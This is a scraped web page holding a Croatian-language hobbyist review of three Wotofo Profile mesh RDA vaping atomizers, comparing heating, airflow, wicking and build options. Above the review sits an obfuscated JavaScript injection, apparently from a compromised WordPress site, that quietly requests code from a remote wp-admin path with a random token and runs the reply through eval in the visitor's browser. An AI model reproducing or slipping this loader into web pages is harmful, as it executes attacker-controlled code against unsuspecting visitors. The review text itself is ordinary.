;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Wotofo Profile RDA – Recenzija by Bernard

Profile RDA

Profile 1.5 RDA

Profile PS RDA dual mesh

Budući da sam probao sve ove atomizere za e-cigarete i da sam se dovoljno dugo družio sa svakim od njih, odlučio sam ih objediniti u jednu kronološku recenziju.

Kada je Wotofo napravio svoj prvi Profile RDA, poludio sam, morao sam ga imati. Jako mi se se svidio mesh grijač, i na Profile Unity RTA sam imao sve osim curenja (meni ga je bilo teško složiti. Uhvatiš ti grif nakon nekog vremena, ali nije nikada praštao niti jednu grešku u wickanju).Bio sam oduševljen brzim ramp UP-om jer je mesh jako tanak i jako se brzo grije, i također i hladi. Na blitzenu sam navikao sa sličnom otporu nekog clapton grijača prvo puhati dok držim gumb i čekam da se pošteno ugrije, pa onda povući. Oblaci pare bili su veliki, aroma je bila prekrasna, taj mesh je za mene bio čudo revolucije u vejpu. Uspoređivao sam ga sa Blitzenom koji mi je do tada bio broj 1. Hype je bio velik, pa sam mislio kako je Profile RDA moj novi br.1.

Nakon nekog vremena se vraćam Blitzenu jer mi je nešto falilo… a to je bila toplina pare koju s tim grijačem u tom atty-u nisam mogao postići. Tada nisam znao u kojem smjeru krenuti istraživati…Izašao je Profile 1.5 RDA, na prvu si mislim, kaj ste to sad tak revolucionarno napravili, sve mi izgleda slično, a kad ono, novi prijatelj… Taj hype nije bio lažan jer ga koristim i dan danas, 2 godine nakon. Ne znam što su napravili s njim, ali s njim sam mogao postići tu toplinu pare koja mi je falila kod prethodnika (imao je 3 opcije grijača: chill, turbo i extreme. Ja sam naravno odmah stavio ex3me). S njim sam otkrio i ss316 mesh kolut jako gusto isprepelten koji si režeš na mjeru kako hoćeš, i s tim grijačem sam mogao pariti i na 100W a da mesh ne kuri vatu tj da dobro natapa. Bunar je dovoljno velik za 4-5 puffova od 3-4 sec na 100W. Za razliku od prethodnika, izgleda mi mnogo bolje, nabrijanije, taj niski usnik mi je jako pridonio izgledu.Bolje su riješene airflow opcije, ima 2 reda po 5 rupica, ako otvoriš skroz nije najveći propuh, ali meni je najviše pasalo sa samo donjih 5 rupica otvorenih. Tako mi najučinkovitije zrak prolazi preko coila i uz malu restrikciju zraka dobivam točno ono što želim. Ako se ne varam, napravili su postove za mesh s malo većim razmakom tako da površina mehsa bude još malo veća, a s time naravno i malo više arome. Kada udišeš taj vape, točno osjetiš kako mesh izbacuje milijarde malih kapljica tekućine, koje nisu dovoljno velike da te zapljuckaju, a opet dovoljno jake da osjetiš malo intenzivinije aftertaste dok mljackaš nakon izdisaja. Nakon dugo korištenja nekako mogu reći da mrvicu priguši kremaste komponente, što meni paše, ali najviše ga koristim za voćne ili blago kremasto voćne kombinacije. Svakako preporučam squonk mod, jer bunar nije jako veliki kao na idućem kog ću spomenuti, ali opet, nije ni mali kao npr na Requiemu.

Nadalje, nedavno je izašao Profile PS RDA sa dual meshom. Iskreno, očekivao sam ga od početka, jer razmišljajući o napretku, nemaš kaj drugo nego utrpati dual mesh 😊. Naravno treba povećati malo radijus, u ovom slučaju na 28,5 mm.Sviđa mi se kako su pozicionirali ta 2 mesha, ali odmah ću na prvu reći da se obzirom na prethodnika tu radi o vrlo malom povećanju mesh površine, jer ta 2 grijača nisu duplo veće površine, te zrak koji udara po grijaču udara samo s jedne strane svakog grijača, pa tu nema nekog pre velikog napretka što se tiče arome. Dobro je to sve napravljeno, ali točno vjerujem da će uskoro izaći Profile PS 1.5 na kojem će opet nešto upgrade-ati i popraviti te sitne nedostatke kako bi ovu mrcinu učinili zaista duplo boljom od prethodnika. Jedva čekam taj dan jer zaista volim Wotofo i mesh RDA.Ima ovaj atty nešto posebno, a to je (prvi put vidim) mogućnost izmjene 510 pin-a i utjecanje na izmjenu iz serijskog builda u paralelni, što bitno mijenja razliku u otporu. Ukratko ako imaš 2 grijača, a svaki je 0.3 ohma, možeš birati hoćeš li otpor 0.15 ili 0.6 ohma. Odmah da vam kažem, na 0.6 ohma i 100W mi radi savršeno. Ne dry burna, prekrasno natapa (ima dubok bunar, čak 3ml), ima topline, arome i pregršt pare. Zaista odlično ali nikako duplo bolje nego na prethodniku. Možda 10-20% jače… za mene nedovoljno da me zadrži… a ni nemam neki mod za njega da lijepo izgledaju skupa…Što se tiče airflowa, malo su ga poboljšali u smislu da su dodali još jedan red rupica, a zatvoriti možeš samo gornji red ili sve, tako da tu isto očekujem još noviteta kod nasljednika.

Što se tiče svih atty-a skupa, svi se jako jako wickaju, jer su RDA. Treba samo paziti da ima dovoljno vate stisnute na grijač (mora biti jako čvrsto provučena) jer ako milimetar mesha nije pokriven vatom, dry hitati će. Ali meni se to nije nikada desilo jer sam uvijek pazio. Zaboravio sam napomenuti da se u svaki od ovih RDA-a može instalirati i regularni žičani grijač, što nisam nikada probao jer je ovaj RDA napravljen u svrhu korištenja mesha. U Profile PS bi trebala moći doći 4 grijača, samo mislim da bi trebao još jedan par ruku za pomoći to wickati. Tko zna, možda probam jednog dana.

Autor: Bernard Jugović

Choose your Reaction!
Leave a Comment